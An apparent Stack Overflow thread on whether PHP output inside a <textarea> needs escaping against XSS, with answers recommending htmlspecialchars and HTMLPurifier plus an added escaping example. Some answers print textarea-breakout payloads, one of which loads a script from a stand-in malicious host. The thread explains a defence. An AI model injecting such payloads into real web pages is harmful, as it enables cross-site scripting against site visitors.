user1190646

Reputation:

Need to escape or sanitise output that is displayed in a <textarea>?

Do you have to escape or sanitise output that will be in a <textarea>?

It seems that if I sanitise it using htmlentities(), the actual &...; character replacements come up.

Upvotes: 1

Views: 463

Answers (6)

Mike Brant

Reputation: 71384

Just using htmlspecialchars() is NOT enough. It still leaves you vulnerable to certain multibyte character attack vectors (even when using htmlspecialchars($string, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')).

Perhaps look at a library like HTMLPurifier to give you a more complete solution.

Here is a pretty good summary of XSS protection in PHP.

http://www.bytetouch.com/blog/programming/protecting-php-scripts-from-cross-site-scripting-xss-attacks/

Upvotes: 0

David Müller

Reputation: 5351

Well, you have to:

<?php
// Untrusted content that contains a closing tag for the textarea
$content = "</textarea><script>alert('hi!')</script>";
?>

<textarea>
<?php echo $content; // echoed without escaping: the </textarea> inside $content ends the element and the script runs ?>
</textarea>


Upvotes: 1

Mario

Reputation: 36497

Always escape all occurrences of < and > (with &lt; and &gt;) within the textarea's content. Otherwise one could provide the following content (example) to "escape" the textarea and inject HTML code:

</textarea><script src="http://malicious.code.is/us.js"></script>

Otherwise this could result in the following code:

<textarea id="text"></textarea><script src="http://malicious.code.is/us.js"></script></textarea>

The second </textarea> at the end would be ignored and the script tag before would be executed.

Upvotes: 0
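As an added example (not code from any of the answers above), a small PHP script that renders the same breakout payload with and without escaping and checks the result; textarea_value() and render_textarea() are helper names chosen here, not PHP built-ins:

```php
<?php
// Added example, not from any answer on this page.
// textarea_value() and render_textarea() are assumed helper names.
declare(strict_types=1);

/**
 * Escape untrusted text for use as the content of a <textarea>.
 * ENT_QUOTES escapes both quote styles, ENT_SUBSTITUTE replaces invalid
 * UTF-8 sequences instead of returning an empty string, and the explicit
 * charset keeps byte interpretation consistent with the page encoding.
 */
function textarea_value(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Build a complete <textarea> element, escaping the content or not. */
function render_textarea(string $name, string $value, bool $escape): string
{
    $content  = $escape ? textarea_value($value) : $value;
    $safeName = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<textarea name=\"$safeName\">$content</textarea>";
}

// Constructed sample input: the breakout payload discussed in the answers.
$payload = "</textarea><script>alert('hi!')</script>";

$unsafe = render_textarea('comment', $payload, false);
$safe   = render_textarea('comment', $payload, true);

// Unescaped: the payload's </textarea> closes the element early, so the
// <script> that follows is parsed as live markup.
echo $unsafe, PHP_EOL;

// Escaped: every < and > becomes &lt; / &gt;, so the whole payload stays
// inside the element as literal text.
echo $safe, PHP_EOL;

// Check 1: the escaped markup has exactly one closing tag, the real one.
if (substr_count($safe, '</textarea>') !== 1) {
    throw new RuntimeException('textarea breakout not prevented');
}

// Check 2: the &lt; the asker saw is only in the HTML source. The browser
// decodes entities before displaying the textarea, so the user sees the
// original text; this round trip shows the same decoding.
if (html_entity_decode(textarea_value($payload), ENT_QUOTES, 'UTF-8') !== $payload) {
    throw new RuntimeException('escaped text does not decode back to the original');
}
```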

Alix Axel

Reputation: 154573

Yes, you need to sanitize. Use htmlspecialchars($str, ENT_QUOTES) instead.

Upvotes: 0

Shoe

Reputation: 76260

You need to consider whether the output is editable by the user or not. If it is not and it is a trusted output (maybe coming from pre-defined texts that YOU wrote) you obviously don't. Otherwise yes. And the HTML chars replacement is quite normal, but you don't have to worry because when the page is read and output to the user's browser all the previous characters will still be there.

Notice that the > and < characters could be used, if not sanitised, to inject other HTML code and in particular the <script> tag that can run JavaScript.

Upvotes: 0

Mike Brant

Reputation: 71384

If that output was initially provided by the user or any untrusted source (i.e. not directly from your code) then it needs to be sanitized to prevent against XSS attacks.

Upvotes: 0
